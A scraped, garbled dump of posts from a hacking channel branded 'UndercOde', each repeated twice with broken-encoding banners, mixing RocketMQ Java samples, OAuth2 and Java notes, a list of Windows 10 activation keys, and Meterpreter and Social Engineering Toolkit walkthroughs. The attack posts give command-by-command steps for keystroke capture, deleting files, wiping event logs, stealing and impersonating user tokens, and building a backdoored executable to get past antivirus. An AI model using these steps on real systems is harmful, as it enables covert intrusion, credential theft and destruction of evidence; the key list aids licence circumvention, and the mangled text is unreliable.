β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ methode 2 for sending message : Send asynchronously
instagram.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
1) The calling send()thread will block when sending synchronously , and the current thread will not block when sending asynchronously.
2) The send result will be called back by a callback function. The following code is an example of sending a message asynchronously.
3) The difference from sending a message synchronously is that it sends an additional SendCallback object when sending a message.
4) This method returns immediately after calling this method without waiting for the response from the Broker.
5) The corresponding method of the SendCallback object will be called back after the message is sent successfully or fails. So for the following example, the second message is sent when the first message has not been confirmed by the Broker and the third message is the same. The order in which they are successfully sent by the Broker is actually uncertain.
@Test
public void sendAsync() throws Exception {
DefaultMQProducer producer = new DefaultMQProducer("group1");
producer.setNamesrvAddr(nameServer);
producer.start();
CountDownLatch latch = new CountDownLatch(10);
for (int i = 0; i < 10; i++) {
Message message = new Message("topic1", ("send by async, no." + i).getBytes(RemotingHelper.DEFAULT_CHARSET));
producer.send(message, new SendCallback() {
@Override
public void onSuccess(SendResult sendResult) {
System.out.println("..οΌ" + message);
latch.countDown();
}
@Override
public void onException(Throwable throwable) {
System.out.println("...");
latch.countDown();
}
});
}
latch.await();
producer.shutdown();
}
twenty one
twenty two
twenty three
twenty four
25...
6) If sending an asynchronous message fails, it will also retry internally. The maximum number of retries is setRetryTimesWhenSendAsyncFailed()specified, and the default is 2.
ONEWAY
ββββββββββββββββ
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ methode 2 for sending message : Send asynchronously
instagram.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
1) The calling send()thread will block when sending synchronously , and the current thread will not block when sending asynchronously.
2) The send result will be called back by a callback function. The following code is an example of sending a message asynchronously.
3) The difference from sending a message synchronously is that it sends an additional SendCallback object when sending a message.
4) This method returns immediately after calling this method without waiting for the response from the Broker.
5) The corresponding method of the SendCallback object will be called back after the message is sent successfully or fails. So for the following example, the second message is sent when the first message has not been confirmed by the Broker and the third message is the same. The order in which they are successfully sent by the Broker is actually uncertain.
@Test
public void sendAsync() throws Exception {
DefaultMQProducer producer = new DefaultMQProducer("group1");
producer.setNamesrvAddr(nameServer);
producer.start();
CountDownLatch latch = new CountDownLatch(10);
for (int i = 0; i < 10; i++) {
Message message = new Message("topic1", ("send by async, no." + i).getBytes(RemotingHelper.DEFAULT_CHARSET));
producer.send(message, new SendCallback() {
@Override
public void onSuccess(SendResult sendResult) {
System.out.println("..οΌ" + message);
latch.countDown();
}
@Override
public void onException(Throwable throwable) {
System.out.println("...");
latch.countDown();
}
});
}
latch.await();
producer.shutdown();
}
twenty one
twenty two
twenty three
twenty four
25...
6) If sending an asynchronous message fails, it will also retry internally. The maximum number of retries is setRetryTimesWhenSendAsyncFailed()specified, and the default is 2.
ONEWAY
ββββββββββββββββ
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ ONEWAY - sms sending addition information by Underc0de :
In addition to synchronous sending and asynchronous sending, there is also a sending method called ONEWAY.
> Its sending is one-way, that is, it does not need to wait for the response from the Broker. It only needs to send, regardless of the success or failure of sending. It is usually used in scenarios where messages are not so important and can be lost. It is sent by calling sendOneway().
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
@Test
public void sendOneway() throws Exception {
DefaultMQProducer producer = new DefaultMQProducer("group1");
producer.setNamesrvAddr(nameServer);
producer.start();
for (int i=0; i<10; i++) {
Message message = new Message("topic1", "tag2", ("message send with oneway, no."+i).getBytes());
producer.sendOneway(message);
}
producer.shutdown();
}
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ ONEWAY - sms sending addition information by Underc0de :
In addition to synchronous sending and asynchronous sending, there is also a sending method called ONEWAY.
> Its sending is one-way, that is, it does not need to wait for the response from the Broker. It only needs to send, regardless of the success or failure of sending. It is usually used in scenarios where messages are not so important and can be lost. It is sent by calling sendOneway().
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
@Test
public void sendOneway() throws Exception {
DefaultMQProducer producer = new DefaultMQProducer("group1");
producer.setNamesrvAddr(nameServer);
producer.start();
for (int i=0; i<10; i++) {
Message message = new Message("topic1", "tag2", ("message send with oneway, no."+i).getBytes());
producer.sendOneway(message);
}
producer.shutdown();
}
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Windows 10 2020 Lastest Serials
Note : If Serial Activation error( non official server win... ) - try official free KMS
T.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
Windows 10 Enterprise N 4CPRK-NM3K3-X6XXQ-RXX86-WXCHW
Windows 10 Enterprise QFFDN-GRT3P-VKWWX-X7T3R-8B639
Windows 10 Professional N VK7JG-NPHTM-C97JM-9MPGT-3V66T
Windows 10 Education DCPHK-NFMTC-H88MJ-PFHPY-QJ4BJ
Windows 10 Enterprise 2018 LTSB YTMG3-N6DKC-DKB77-7M9GH-8HVX7
Windows 10 Home Key 2F77B-TNFGY-69QQF-B8YKP-D69TJ
Windows 10 Enterprise 2018 LTSB N DXG7C-N36C4-C4HTG-X4T3X-2YV77
Windows 10 Professional WNMTR-4C88C-JK8YV-HQ7T2-76DF9
Windows 10 Enterprise 2018 LTSB N WYPNQ-8C467-V2W6J-TX4WX-WT2RQ
Windows 10 Enterprise G DPH2V-TTNVB-4X9Q3-TJR4H-KHJW4
Windows 10 Home Singe Language YNMGQ-8RYV3-4PGQ3-C8XTP-7CFBY
Windows 10 Pro 44RPN-FTY23-9VTTB-MP9BX-T84FV
Windows 10 Enterprise 2016 LTSB 84NGF-MHBT6-FXBX8-QWJK7-DRR8H
Windows Pro N for Workstations NW6C2-QMPVW-D7KKK-3GKT6-VCFB2
Windows 10 Home Single Language 8PTT6-RNW4C-6V7J2-C2D3X-MHBPB
Windows 10 Professional Workstation YVWGF-BXNMC-HTQYQ-CPQ99-66QFC
Windows 10 S GJTYN-HDMQY-FRR76-HVGC7-QPF8P
Windows 10 Home Country Specific YYVX9-NTFWV-6MDM3-9PT4T-4M68B
Windows 10 Education N XGVPP-NMH47-7TTHJ-W3FW7-8HV2C
Windows 10 Enterprise Evaluation NPPR9-FWDCX-D2C8J-H872K-2YT43
Windows 10 Home + Office 2016 Professional Key MNXKQ-WY2CT-JWBJ2-T68TQ-YBH2V
Windows 10 Enterprise NW6C2-QMPVW-D7KKK-3GKT6-VCFB2
Windows 10 Pro + Office 2016 Professional Key MNXKQ-WY2CT-JWBJ2-
T68TQ-YBH2V
Windows 10 Education N DCPHK-NFMTC-H88MJ-PFHPY-QJ4BJ
Windows 10 Education Key WYPNQ-8C467-V2W6J-TX4WX-WT2RQ
Windows 10 Education QFFDN-GRT3P-VKWWX-X7T3R-8B639
Windows 10 Enterprise Key 84NGF-MHBT6-FXBX8-QWJK7-DRR8H
Windows 10 Pro N 2F77B-TNFGY-69QQF-B8YKP-D69TJ
Windows 10 Pro Key VK7JG-NPHTM-C97JM-9MPGT-3V66T
Windows 10 Home WNMTR-4C88C-JK8YV-HQ7T2-76DF9
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Windows 10 2020 Lastest Serials
Note : If Serial Activation error( non official server win... ) - try official free KMS
T.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
Windows 10 Enterprise N 4CPRK-NM3K3-X6XXQ-RXX86-WXCHW
Windows 10 Enterprise QFFDN-GRT3P-VKWWX-X7T3R-8B639
Windows 10 Professional N VK7JG-NPHTM-C97JM-9MPGT-3V66T
Windows 10 Education DCPHK-NFMTC-H88MJ-PFHPY-QJ4BJ
Windows 10 Enterprise 2018 LTSB YTMG3-N6DKC-DKB77-7M9GH-8HVX7
Windows 10 Home Key 2F77B-TNFGY-69QQF-B8YKP-D69TJ
Windows 10 Enterprise 2018 LTSB N DXG7C-N36C4-C4HTG-X4T3X-2YV77
Windows 10 Professional WNMTR-4C88C-JK8YV-HQ7T2-76DF9
Windows 10 Enterprise 2018 LTSB N WYPNQ-8C467-V2W6J-TX4WX-WT2RQ
Windows 10 Enterprise G DPH2V-TTNVB-4X9Q3-TJR4H-KHJW4
Windows 10 Home Singe Language YNMGQ-8RYV3-4PGQ3-C8XTP-7CFBY
Windows 10 Pro 44RPN-FTY23-9VTTB-MP9BX-T84FV
Windows 10 Enterprise 2016 LTSB 84NGF-MHBT6-FXBX8-QWJK7-DRR8H
Windows Pro N for Workstations NW6C2-QMPVW-D7KKK-3GKT6-VCFB2
Windows 10 Home Single Language 8PTT6-RNW4C-6V7J2-C2D3X-MHBPB
Windows 10 Professional Workstation YVWGF-BXNMC-HTQYQ-CPQ99-66QFC
Windows 10 S GJTYN-HDMQY-FRR76-HVGC7-QPF8P
Windows 10 Home Country Specific YYVX9-NTFWV-6MDM3-9PT4T-4M68B
Windows 10 Education N XGVPP-NMH47-7TTHJ-W3FW7-8HV2C
Windows 10 Enterprise Evaluation NPPR9-FWDCX-D2C8J-H872K-2YT43
Windows 10 Home + Office 2016 Professional Key MNXKQ-WY2CT-JWBJ2-T68TQ-YBH2V
Windows 10 Enterprise NW6C2-QMPVW-D7KKK-3GKT6-VCFB2
Windows 10 Pro + Office 2016 Professional Key MNXKQ-WY2CT-JWBJ2-
T68TQ-YBH2V
Windows 10 Education N DCPHK-NFMTC-H88MJ-PFHPY-QJ4BJ
Windows 10 Education Key WYPNQ-8C467-V2W6J-TX4WX-WT2RQ
Windows 10 Education QFFDN-GRT3P-VKWWX-X7T3R-8B639
Windows 10 Enterprise Key 84NGF-MHBT6-FXBX8-QWJK7-DRR8H
Windows 10 Pro N 2F77B-TNFGY-69QQF-B8YKP-D69TJ
Windows 10 Pro Key VK7JG-NPHTM-C97JM-9MPGT-3V66T
Windows 10 Home WNMTR-4C88C-JK8YV-HQ7T2-76DF9
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Fix Problem Kali-Parrot error install (try again)
problems when attempting to install - Kali Linux 1.0.6 64 Bit ISO - the error is exactly the same every time well let Fix
T.me/UnderCodeTesting
π¦ ππΌππ πππΈβπ :
1) let mention that the same error occurs on 2 different computers as well, when it comes to - installing the system - and the error pops up after 4-5% into the installatjon process.
2) ... so.... after som trial and error with different mediums, DVD - USB stick, different burning options, USB-preps etc... i download - Kali Linux 1.0.6 64 Bit Mini ISO - to see if i am able to get Kali Linux installed on my stationary computer.
3) Everything seems perfect , the installstion alternatives pops up, and the fun begins.
> 1st try: i don't modify the list that appears
result - Failure : installing the system
> 2nd try: i remove the SSH server option
resukt - Failure: installing the system
> 3rd try: removing the pen-test-pack
result - installation proceeds uninterrupted
...in a logic sense, this point to that the pen-test-pack has som kind of bug or something...or?
> Anyway, is there an option to install the - pen-test-pack
Well done ! Any doubt feel free to ask
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Fix Problem Kali-Parrot error install (try again)
problems when attempting to install - Kali Linux 1.0.6 64 Bit ISO - the error is exactly the same every time well let Fix
T.me/UnderCodeTesting
π¦ ππΌππ πππΈβπ :
1) let mention that the same error occurs on 2 different computers as well, when it comes to - installing the system - and the error pops up after 4-5% into the installatjon process.
2) ... so.... after som trial and error with different mediums, DVD - USB stick, different burning options, USB-preps etc... i download - Kali Linux 1.0.6 64 Bit Mini ISO - to see if i am able to get Kali Linux installed on my stationary computer.
3) Everything seems perfect , the installstion alternatives pops up, and the fun begins.
> 1st try: i don't modify the list that appears
result - Failure : installing the system
> 2nd try: i remove the SSH server option
resukt - Failure: installing the system
> 3rd try: removing the pen-test-pack
result - installation proceeds uninterrupted
...in a logic sense, this point to that the pen-test-pack has som kind of bug or something...or?
> Anyway, is there an option to install the - pen-test-pack
Well done ! Any doubt feel free to ask
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ The OAuth2.0 protocol Full Tutorial by Underc0de :
OAuth2.0 is a relatively popular authorization mechanism in recent years. For ordinary users, you may use it every day . Most of the third-party logins we often use are based on OAuth2.0 . With the interconnection of applications and the invocation of personalized services, open authorization becomes an objective need.
instagram.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
Simple understanding of OAuth2.0
1) OAuth defines the following roles and clearly distinguishes their respective concerns to ensure that a consistent authorization service is quickly built:
2) Resource Owner , usually refers to the end user, whose role is to agree or reject, or even selectively request authorization to third-party applications.
3) User Agent refers to some channels authorized by the resource owner. Generally refers to the browser, APP
4) A client program that requests authorization and requests to access restricted resources.
5) Authorization Server A server that authenticates a user's authorization and responds with an authorization response based on the authentication result.
6) Resource Server A server that can accept and respond to requests for protected resources.
7) Isn't the mere textual description a bit difficult to understand? So here I will personally illustrate the above four concepts with an example. It's the season for programmers to interview again. One year I went to interview, only to find such a "tall" on the place.
π¦ The visitor needs to pass the verification code to pass the gate. I contacted the interviewing company's HR. It gave me a link, and after opening it, a WeChat applet gave the following process:
1) Example if I sent an interview request to the interview company (HR).
2) HR gave me a link where I could get an entry permit request.
3) I made a request to enter through the link.
4) The request got a response and returned me a verification code.
5) I enter the verification code in the gate program.
6) Release after verification.
7) After I studied the OAuth2.0 protocol, I found that this experience can reflect some of the design concepts of OAuth2.0 .
8) Visitors must be authorized to access the building. In this way, people and other people are prevented from entering and leaving the office, and the visitor is controllable (from the time and number of visits), and even the access to the floor can be controlled (of course not in the above example).
9) Combined OAuth2.0 know visitors is the Client, the company (the owners) is the Resource Owner, property is the Authorization Server, the gates is the Resource Server, gates, there may also be subject to control property .
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ The OAuth2.0 protocol Full Tutorial by Underc0de :
OAuth2.0 is a relatively popular authorization mechanism in recent years. For ordinary users, you may use it every day . Most of the third-party logins we often use are based on OAuth2.0 . With the interconnection of applications and the invocation of personalized services, open authorization becomes an objective need.
instagram.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
Simple understanding of OAuth2.0
1) OAuth defines the following roles and clearly distinguishes their respective concerns to ensure that a consistent authorization service is quickly built:
2) Resource Owner , usually refers to the end user, whose role is to agree or reject, or even selectively request authorization to third-party applications.
3) User Agent refers to some channels authorized by the resource owner. Generally refers to the browser, APP
4) A client program that requests authorization and requests to access restricted resources.
5) Authorization Server A server that authenticates a user's authorization and responds with an authorization response based on the authentication result.
6) Resource Server A server that can accept and respond to requests for protected resources.
7) Isn't the mere textual description a bit difficult to understand? So here I will personally illustrate the above four concepts with an example. It's the season for programmers to interview again. One year I went to interview, only to find such a "tall" on the place.
π¦ The visitor needs to pass the verification code to pass the gate. I contacted the interviewing company's HR. It gave me a link, and after opening it, a WeChat applet gave the following process:
1) Example if I sent an interview request to the interview company (HR).
2) HR gave me a link where I could get an entry permit request.
3) I made a request to enter through the link.
4) The request got a response and returned me a verification code.
5) I enter the verification code in the gate program.
6) Release after verification.
7) After I studied the OAuth2.0 protocol, I found that this experience can reflect some of the design concepts of OAuth2.0 .
8) Visitors must be authorized to access the building. In this way, people and other people are prevented from entering and leaving the office, and the visitor is controllable (from the time and number of visits), and even the access to the floor can be controlled (of course not in the above example).
9) Combined OAuth2.0 know visitors is the Client, the company (the owners) is the Resource Owner, property is the Authorization Server, the gates is the Resource Server, gates, there may also be subject to control property .
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ How to gain access of OAuth accessBased on the above principles, OAuth 2.0 has the following points that need to be clearly recognized:
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
1) OAuth2.0 is not an identity authentication protocol. Although identity authentication is involved in the authorization process, the OAuth2.0 protocol itself does not process user information. When a client accesses a protected resource, it does not care about the owner of the resource.
2) OAuth2.0 does not provide some message signatures. In order to ensure security, it should not be separated from Https . When using other protocols or systems, a security mechanism should also be specified to assume the tasks undertaken by Https .
3) OAuth2.0 does not define the encryption method, although the JOSE specification is currently used more
4) OAuth2.0 Although the token is held and used by the client, the client cannot parse and process the token.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ How to gain access of OAuth accessBased on the above principles, OAuth 2.0 has the following points that need to be clearly recognized:
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
1) OAuth2.0 is not an identity authentication protocol. Although identity authentication is involved in the authorization process, the OAuth2.0 protocol itself does not process user information. When a client accesses a protected resource, it does not care about the owner of the resource.
2) OAuth2.0 does not provide some message signatures. In order to ensure security, it should not be separated from Https . When using other protocols or systems, a security mechanism should also be specified to assume the tasks undertaken by Https .
3) OAuth2.0 does not define the encryption method, although the JOSE specification is currently used more
4) OAuth2.0 Although the token is held and used by the client, the client cannot parse and process the token.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ What are the limitations of Java's anonymous inner classes?
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
Ubiquitous anonymous inner classes
button.setOnClickListener (new OnClickListener () {
});
In the virtual machine, the anonymous inner class has a name, OuterClass $ 1
class RunnableFoo extends Foo implements Runnable {
};
Anonymous inner classes cannot be written like this, but local classes can be written, but kotlin can be written like this val runnableFoo = object: Foo (), Runnable {}
Constructor of anonymous inner class, generated by the compiler, the parameter list includes
1) External objects (defined in a non-static domain)
2) External objects of the parent class (parent class is not static)
3) the constructor parameter of the parent class (the parent class has a constructor and the parameter list is not empty)
4) Externally captured variables (references to external final variables in the method body)
π¦ Anonymous inner classes are prone to memory leaks
to sum up
1) No name in human cognitive sense
2) can only inherit a parent class value to implement an interface
3) the parent class is a non-static type, optionally requires an external instance of the parent class to initialize
4) If it is defined in a non-static scope, it will reference an external class instance
5) can only capture final variables in external scope
6) When creating an interface with a single method, it can be transformed with a lambda
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ What are the limitations of Java's anonymous inner classes?
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
Ubiquitous anonymous inner classes
button.setOnClickListener (new OnClickListener () {
});
In the virtual machine, the anonymous inner class has a name, OuterClass $ 1
class RunnableFoo extends Foo implements Runnable {
};
Anonymous inner classes cannot be written like this, but local classes can be written, but kotlin can be written like this val runnableFoo = object: Foo (), Runnable {}
Constructor of anonymous inner class, generated by the compiler, the parameter list includes
1) External objects (defined in a non-static domain)
2) External objects of the parent class (parent class is not static)
3) the constructor parameter of the parent class (the parent class has a constructor and the parameter list is not empty)
4) Externally captured variables (references to external final variables in the method body)
π¦ Anonymous inner classes are prone to memory leaks
to sum up
1) No name in human cognitive sense
2) can only inherit a parent class value to implement an interface
3) the parent class is a non-static type, optionally requires an external instance of the parent class to initialize
4) If it is defined in a non-static scope, it will reference an external class instance
5) can only capture final variables in external scope
6) When creating an interface with a single method, it can be transformed with a lambda
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Controlling Meterpreter full-kali-parrot-debian-root termux :
> Meterpreter is a killer in the Metasploit framework. It is usually used as an attack payload after exploiting the vulnerability.
> The attack payload can return to the user a control channel after the vulnerability is triggered.
> When using Armitage, MSFCLI, or MSFCONSOLE to obtain a Meterpreter connection on the target system, the user must use Meterpreter to pass the attack payload. MSFCONSOLE is used to manage user sessions, while Meterpreter is the interaction between attack payloads and penetration attacks. This section will introduce the use of Meterpreter.
instagram.com/UndercOdeTestingCompany
π¦Meterpreter includes some common commands as shown below.:
help: View help information.
background: Allows users to have Meterpreter sessions in the background.
download: Allows users to download files from intruding hosts.
upload: Allow users to upload files to the intruding host.
execute: Allows users to execute commands on the intruding host.
shell: Allows users to run Windows shell commands on the intruding host
(Windows host only).
session -i: allows users to switch sessions.
π¦ Control is achieved by opening MSFCONSOLE. The specific operation steps are shown below:
1) Start an active session on MSFCONSOLE.
2) The login keyboard input is initiated by the user of the system. The execution command is as follows:
meterpreter > keyscan_start
Starting the keystroke snifferβ¦
From the output, you can see that keyboard input sniffing is enabled.
3) Capture keyboard input from users of vulnerable systems. The execution command is as follows:
meterpreter > keyscan_dump
Dumping captured keystrokesβ¦
<Return> www.example.site.. <Return> aaaa <Return> <Back> <Back> <Back> <Back> <Back>
information indicates that the user entered
, www.example..., the enter key, and the exit key in the vulnerable system.
4) Stop capturing keyboard input from users of the vulnerable system. The execution command is as follows:
meterpreter > keyscan_stop
Stopping the keystroke snifferβ¦
From the output, you can see that keyboard input sniffing has stopped.
5) Delete a file on the vulnerable system. The execution command is as follows:
meterpreter > del exploited.docx
6) Clear the event log on the vulnerable system. The execution command is as follows:
meterpreter > clearev
[*] Wiping 57 records from Applicationβ¦
[*] Wiping 107 records from Systemβ¦
[*] Wiping 0 records from Securityβ¦
7) The output information shows all processes running in the vulnerable system, including the process ID number, process name, system architecture, user, and the path of the running program.
8) Use kill to kill the process number specified in the vulnerable system. The execution command is as follows:
meterpreter > kill 2040
Killing: 2040
9) Attempt to steal a fake token from the vulnerable system. The execution command is as follows:
meterpreter > steal_token
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Controlling Meterpreter full-kali-parrot-debian-root termux :
> Meterpreter is a killer in the Metasploit framework. It is usually used as an attack payload after exploiting the vulnerability.
> The attack payload can return to the user a control channel after the vulnerability is triggered.
> When using Armitage, MSFCLI, or MSFCONSOLE to obtain a Meterpreter connection on the target system, the user must use Meterpreter to pass the attack payload. MSFCONSOLE is used to manage user sessions, while Meterpreter is the interaction between attack payloads and penetration attacks. This section will introduce the use of Meterpreter.
instagram.com/UndercOdeTestingCompany
π¦Meterpreter includes some common commands as shown below.:
help: View help information.
background: Allows users to have Meterpreter sessions in the background.
download: Allows users to download files from intruding hosts.
upload: Allow users to upload files to the intruding host.
execute: Allows users to execute commands on the intruding host.
shell: Allows users to run Windows shell commands on the intruding host
(Windows host only).
session -i: allows users to switch sessions.
π¦ Control is achieved by opening MSFCONSOLE. The specific operation steps are shown below:
1) Start an active session on MSFCONSOLE.
2) The login keyboard input is initiated by the user of the system. The execution command is as follows:
meterpreter > keyscan_start
Starting the keystroke snifferβ¦
From the output, you can see that keyboard input sniffing is enabled.
3) Capture keyboard input from users of vulnerable systems. The execution command is as follows:
meterpreter > keyscan_dump
Dumping captured keystrokesβ¦
<Return> www.example.site.. <Return> aaaa <Return> <Back> <Back> <Back> <Back> <Back>
information indicates that the user entered
, www.example..., the enter key, and the exit key in the vulnerable system.
4) Stop capturing keyboard input from users of the vulnerable system. The execution command is as follows:
meterpreter > keyscan_stop
Stopping the keystroke snifferβ¦
From the output, you can see that keyboard input sniffing has stopped.
5) Delete a file on the vulnerable system. The execution command is as follows:
meterpreter > del exploited.docx
6) Clear the event log on the vulnerable system. The execution command is as follows:
meterpreter > clearev
[*] Wiping 57 records from Applicationβ¦
[*] Wiping 107 records from Systemβ¦
[*] Wiping 0 records from Securityβ¦
7) The output information shows all processes running in the vulnerable system, including the process ID number, process name, system architecture, user, and the path of the running program.
8) Use kill to kill the process number specified in the vulnerable system. The execution command is as follows:
meterpreter > kill 2040
Killing: 2040
9) Attempt to steal a fake token from the vulnerable system. The execution command is as follows:
meterpreter > steal_token
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How to obtain a Meterpreter Shell Using fake tokens by Underc0de :
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
In order to obtain a Meterpreter Shell, users must use Metasploit to attack a host before they can successfully establish a Meterpreter session. The method of using Metasploit to attack the host is described before on undercode chats groups ,and will not be repeated here. The specific steps for using token impersonation are shown below.
1) Start a Meterpreter session. The execution command is as follows:
msf auxiliary(browser_autopwn) > sessions -i 1
[*] Starting interaction with 1β¦
meterpreter >
From the output, you can see that the Meterpreter session was successfully started.
2) Use the use incognito command to load the incognito module, and then enumerate the tokens. The execution command is as follows:
meterpreter > use incognito
Loading extension incognitoβ¦success.
3) now in output on your script see that the list of currently valid token commands is list_tokens. After executing the above command, a large amount of information will be output. Due to space reasons, part of the content is replaced by ellipsis (...).
π¦ List all tokens. The execution command is as follows:
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
Delegation Tokens Available
===============================================
AA-886OKJM26FSW\Test
Impersonation Tokens Available
===============================================
No tokens available
From the output information, you can see that the valid tokens allocated are AA-886OKJM26FSW \ Test. AA-886OKJM26FSW indicates the host name of the target system, and Test indicates the user name for login.
4) Use the impersonate_token command to impersonate the Test user for attack. The execution command is as follows:
meterpreter > impersonate_token AA-886OKJM26FSW\\Test
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
[+] Delegation token available
[+] Successfully impersonated user AA-886OKJM26FSW\Test
From the output information, you can see that the fake Test user succeeded. At this point, you can perform any operation in the target system by elevating your permissions.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How to obtain a Meterpreter Shell Using fake tokens by Underc0de :
t.me/UndercOdeTesting
π¦ ππΌππ πππΈβπ :
In order to obtain a Meterpreter Shell, users must use Metasploit to attack a host before they can successfully establish a Meterpreter session. The method of using Metasploit to attack the host is described before on undercode chats groups ,and will not be repeated here. The specific steps for using token impersonation are shown below.
1) Start a Meterpreter session. The execution command is as follows:
msf auxiliary(browser_autopwn) > sessions -i 1
[*] Starting interaction with 1β¦
meterpreter >
From the output, you can see that the Meterpreter session was successfully started.
2) Use the use incognito command to load the incognito module, and then enumerate the tokens. The execution command is as follows:
meterpreter > use incognito
Loading extension incognitoβ¦success.
3) now in output on your script see that the list of currently valid token commands is list_tokens. After executing the above command, a large amount of information will be output. Due to space reasons, part of the content is replaced by ellipsis (...).
π¦ List all tokens. The execution command is as follows:
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
Delegation Tokens Available
===============================================
AA-886OKJM26FSW\Test
Impersonation Tokens Available
===============================================
No tokens available
From the output information, you can see that the valid tokens allocated are AA-886OKJM26FSW \ Test. AA-886OKJM26FSW indicates the host name of the target system, and Test indicates the user name for login.
4) Use the impersonate_token command to impersonate the Test user for attack. The execution command is as follows:
meterpreter > impersonate_token AA-886OKJM26FSW\\Test
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
[+] Delegation token available
[+] Successfully impersonated user AA-886OKJM26FSW\Test
From the output information, you can see that the fake Test user succeeded. At this point, you can perform any operation in the target system by elevating your permissions.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Note: You need to enter two backslashes (\) when typing HOSTNAME \ USERNAME.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Launching the Social Engineering Toolkit :
Before using the Social Engineering Toolkit, you need to launch the tool. The specific operation steps are shown below.
π¦ ππΌππ πππΈβπ :
1) Start SET. Execute the following command in the terminal:
> root@kali:~# setoolkit
>Or select "Applications" | Kali Linux | "Exploit Toolkit" | Social Engineering Toolkit |
2) Select Attack Social Engineering here, the number in the menu is 1, so enter 1 after set>, and the following information will be displayed:
set> 1
π¦ Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) QRCode Generator Attack Vector
10) Powershell Attack Vectors
11) Third Party Modules
99) Return back to the main menu.
set>
set>
π¦ information shows the menu options for attacking social engineering, at which point you can choose the type of attack engineering and then attack.
1) Choose to create an attack payload and listener here, enter the number 4, example
2 ) The target system of the attack in this example is Windows XP 32-bit, so select number 2 here. As follows:
set:payloads> 2
3) Select one of the below, 'backdoored executable' is typically the best. However,
most still get picked up by AV. You may need to do additional packing/crypting
π¦ in order to get around basic AV detection.
1) shika..
2) No Encoding
3) Multi-Encoder
4) Backdoored Executable
The output information shows several ways to obtain an AV-based attack.
5) Select the fourth type and enter the number 4
E N J O Y B Y U N D E R C O D E
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Launching the Social Engineering Toolkit :
Before using the Social Engineering Toolkit, you need to launch the tool. The specific operation steps are shown below.
π¦ ππΌππ πππΈβπ :
1) Start SET. Execute the following command in the terminal:
> root@kali:~# setoolkit
>Or select "Applications" | Kali Linux | "Exploit Toolkit" | Social Engineering Toolkit |
2) Select Attack Social Engineering here, the number in the menu is 1, so enter 1 after set>, and the following information will be displayed:
set> 1
π¦ Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) QRCode Generator Attack Vector
10) Powershell Attack Vectors
11) Third Party Modules
99) Return back to the main menu.
set>
set>
π¦ information shows the menu options for attacking social engineering, at which point you can choose the type of attack engineering and then attack.
1) Choose to create an attack payload and listener here, enter the number 4, example
2 ) The target system of the attack in this example is Windows XP 32-bit, so select number 2 here. As follows:
set:payloads> 2
3) Select one of the below, 'backdoored executable' is typically the best. However,
most still get picked up by AV. You may need to do additional packing/crypting
π¦ in order to get around basic AV detection.
1) shika..
2) No Encoding
3) Multi-Encoder
4) Backdoored Executable
The output information shows several ways to obtain an AV-based attack.
5) Select the fourth type and enter the number 4
E N J O Y B Y U N D E R C O D E
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
